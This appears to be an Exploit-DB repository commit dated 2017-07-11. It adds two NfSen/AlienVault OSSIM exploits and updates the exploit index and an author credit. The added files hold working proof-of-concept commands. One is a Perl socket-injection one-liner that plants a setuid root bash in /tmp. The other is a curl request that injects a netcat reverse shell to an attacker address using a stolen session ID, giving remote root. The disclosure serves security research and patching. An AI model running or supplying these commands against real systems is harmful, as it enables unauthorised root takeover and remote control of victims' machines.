DB: 2017-07-11

2 new exploits

NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Privilege Escalation

Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow

Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)
Microsoft Internet Explorer 9 - 'jscript9' Java­Script­Stack­Walker Memory Corruption (MS15-056)

NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection

files.csv

@@ -9060,6 +9060,7 @@ id,file,description,date,author,platform,type,port
 41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0
 41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0
 41887,platforms/windows/local/41887.txt,"VirusChaser 8.0 - Buffer Overflow (SEH)",2017-04-14,0x41Li,windows,local,0
+42305,platforms/linux/local/42305.txt,"NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Privilege Escalation",2017-07-10,"Paul Taylor",linux,local,0
 41886,platforms/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Privilege Escalation",2017-04-15,"Nassim Asrir",linux,local,0
 41721,platforms/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
 41722,platforms/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
@@ -14335,7 +14336,7 @@ id,file,description,date,author,platform,type,port
 31639,platforms/php/remote/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote,0
 31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,windows,remote,9090
 31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555
-31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0
+31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",windows,remote,0
 31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,php,remote,0
 31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",unix,remote,0
 31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80
@@ -15571,7 +15572,7 @@ id,file,description,date,author,platform,type,port
 40867,platforms/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote,0
 40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
-40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
+40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer 9 - 'jscript9' Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
 40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
 40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0
 40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
@@ -15689,6 +15690,7 @@ id,file,description,date,author,platform,type,port
 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778
 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
 42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
+42306,platforms/linux/remote/42306.txt,"NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0

platforms/linux/local/42305.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Local root exploit affecting NfSen <= 1.3.7, AlienVault USM/OSSIM <= 5.3.6
+# Version: NfSen 1.3.7
+# Version: AlienVault 5.3.6
+# Date: 2017-07-10
+# Vendor Homepage: http://nfsen.sourceforge.net/
+# Vendor Homepage: http://www.alienvault.com/
+# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download
+# Exploit Author: Paul Taylor / Foregenix Ltd
+# Website: http://www.foregenix.com/blog
+# Tested on: AlienVault USM 5.3.6
+# CVE: CVE-2017-6970
+
+1. Description
+  
+The web user (in AlienVault USB www-data) has access to the NfSen IPC UNIX domain socket. This can be used to send a crafted command (complete with shell metacharacter injection) to the NfSen Perl components, causing OS command injection in a root privilege context, and therefore can be leverage for privilege escalation from the web user to full root privileges.
+
+2. Proof of Concept
+
+Pre-requisites - web user/www-data shell (e.g. web shell, or reverse shell).
+
+Execute the following command:
+
+perl -e 'use Socket; socket(my $nfsend, AF_UNIX, SOCK_STREAM, 0); connect($nfsend, sockaddr_un("/var/nfsen/run/nfsen.comm")); print $nfsend "run-nfdump\nargs=-h \$(bash -c \"cp /bin/bash /tmp\")\n.\nrun-nfdump\nargs=-h \$(bash -c \"chmod u+s /tmp/bash\")\n.\n";'
+  
+This will create a set uid root bash binary in /tmp, which can then be used to gain full root privileges.
+
+3. Solution:
+  
+Update to latest version of NfSen/USM/OSSIM
+

platforms/linux/remote/42306.txt

@@ -0,0 +1,33 @@
+# Exploit Title: NfSen/AlienVault remote root exploit (IPC query command injection)
+# Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected.
+# Version: AlienVault 5.3.4
+# Date: 2017-07-10
+# Vendor Homepage: http://nfsen.sourceforge.net/
+# Vendor Homepage: http://www.alienvault.com/
+# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download
+# Exploit Author: Paul Taylor / Foregenix Ltd
+# Website: http://www.foregenix.com/blog
+# Tested on: AlienVault USM 5.3.4
+# CVE: CVE-2017-6971
+1. Description
+
+A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request containing control characters and shell commands which will be executed as root on a vulnerable system.
+
+2. Proof of Concept
+# From a linux bash prompt on the attacker's machine:
+
+# Set target IP
+targetip='10.100.1.1'
+
+# Set desired command to inject (in this case a reverse shell, using Netcat which is conveniently available on an AlienVault USM All-In-One):
+cmd='nc -ne /bin/bash 10.100.1.2 443';
+
+# Set the PHPSESSID of an authenticated session which has *already* submitted at least one valid NfSen query for processing via the Web UI.
+PHPSESSID='offq09ckq66fqtvdd0vsuhk5c7';
+
+# Next use curl to send the exploit
+curl -o /dev/null -s -k -b "PHPSESSID=$PHPSESSID" -d "process=Process&output=custom+...&customfmt=%0A.%0Arun-nfdump%0Aargs=-h; $cmd #" https://$targetip/ossim/nfsen/nfsen.php
+
+3. Solution:
+
+Update to latest version of NfSen/USM/OSSIM

platforms/windows/remote/31694.py

@@ -10,7 +10,7 @@ banner = """
    
 ####################################################################################
 ###                                                                              ###
-###        Coded by: Muhammad EL Harmeel    m.harmeel(at)gmail(dot)com           ###
+###        Coded by: Muhammad ELHarmeel    @0xhandler          ###
 ###                                                                              ###
 ####################################################################################